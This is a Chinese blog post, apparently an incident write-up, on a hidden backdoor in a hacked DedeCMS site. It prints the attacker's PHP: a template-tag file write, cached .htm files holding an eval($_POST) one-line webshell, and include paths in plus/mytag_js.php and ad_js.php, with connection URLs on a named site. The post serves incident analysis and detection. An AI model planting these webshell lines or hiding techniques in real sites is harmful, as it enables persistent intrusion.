一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.
为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?
无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:
1
|
{dede:php} file_put_contents (’90sec.php’,'’);{/dede:php}
|
但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。
最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:
<!–
|
<!–
1
|
document.write(“axxxxx’); echo ‘OK’;@fclose( $fp );?>”);
|
4
|
–>
|
<!–
2
|
3
|
document.write(“<?php $fp =@ fopen (‘av.php’, ‘a’);@fwrite( $fp ,‘<?php eval ( $_POST [110])?>axxxxx’); echo ‘OK’;@fclose( $fp );?>”);
|
4
|
5
|
–>
|
<!–
|
看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:
看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.
http://www.ji-nuo.com /plus/mytag_js.php?id=1208
http://www.ji-nuo.com /plus/ad_js.php?id=1
具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.
不怎么懂php,所以分析可能有差错的地方,欢迎指正!更多请关注:济宁网站建设
一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)相关推荐
- 一种奇特的DEDE隐藏后门办法
? 15:24 / 28 一种奇特的DEDE隐藏后门办法 单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没 ...
- dedecms mytag_js.php,一种奇特的DEDE隐藏后门办法_91Ri.org
单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? ...
- 一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)
一.SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密.SSH 是目前较可靠,专为远程登录会话和其 ...
- inrul plus 90sec.php,DEDE木马后门专杀工具 针对 90sec.php 一类
2013-08-05 2013年8月5日 网络尖刀 讯: 最近使用DEDE的站长最近肯定都被"90sec.php"一类的木马后门没少折腾,删了又出现,出现了再删,一直都没有办法根治 ...
- 查杀DeDe数据库后门 网站安全狗DeDe专杀工具
2019独角兽企业重金招聘Python工程师标准>>> DeDe是国内知名的PHP开源网站管理系统,很多用户都在使用这一系统,网站安全狗DeDe数据库后门查杀工具,主要就是为了帮助用 ...
- STL vector的几种清空容器(删除)办法
1.为什么需要主动释放vector内存 来自 <https://blog.csdn.net/hellokandy/article/details/78500067> vector其中一个特 ...
- 【漏洞复现】phpstudy隐藏后门漏洞的验证与利用
目录 1 背景 2影响版本 3 漏洞验证与利用 3.1验证 3.2利用:写入webshell 1 背景 phpstudy是国内第一款php后端开发调试集成软件,其将php.apache.mysql.p ...
- Phpstudy隐藏后门
Phpstudy隐藏后门 1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimizer多款 ...
- 整数集上的一种奇特拓扑
在<Proofs from THE BOOK>里素数无限的六种证明的第五种讲到了一种用点集拓扑学知识证明的方法,其中引入了整数集上的一种奇特拓扑. 对 a,b∈ℤ,b>0a,b \i ...
最新文章
- ubuntu14.04.5装cuda7.5记录(解决unable to locate the kernel source,装cuda黑屏问题,装cuda循环登录问题)
- 嵌入式 Hi3515视频编码(H.264)笔记
- 操作系统储存管理功能
- 限时分享:产品经理面试高频考题及答案
- spring中注解无法修饰静态变量
- 【英语学习】【WOTD】minion 释义/词源/示例
- rhel5.5下安装oracle10g报libXp.so.6错误
- 人月神话贯彻执行_《人月神话》读后感与读书笔记
- 遥感数字图像处理——第六章——几何校正
- IOS开发--第三阶段--微博(1)文档
- 如何更高效的学习SLAM?
- 69期-Java SE-036_MySQL-7 SQL练习 -doing
- Amazon SageMaker测评分享,效果超出预期
- Java汉字转拼音工具类(支持首字母和全拼)
- Oracle数据库的嵌套查询
- MTK平台 获取本机的SIM卡中IMSI号
- 2021年IT审计师CISA考试报考条件必备
- c语言如何判断最小公倍数,c语言如何求最大公约数和最小公倍数?
- 4 评价类算法:变异系数法笔记(附Python代码)
- 报表合并软件怎么快速将多表格文件整合到一个表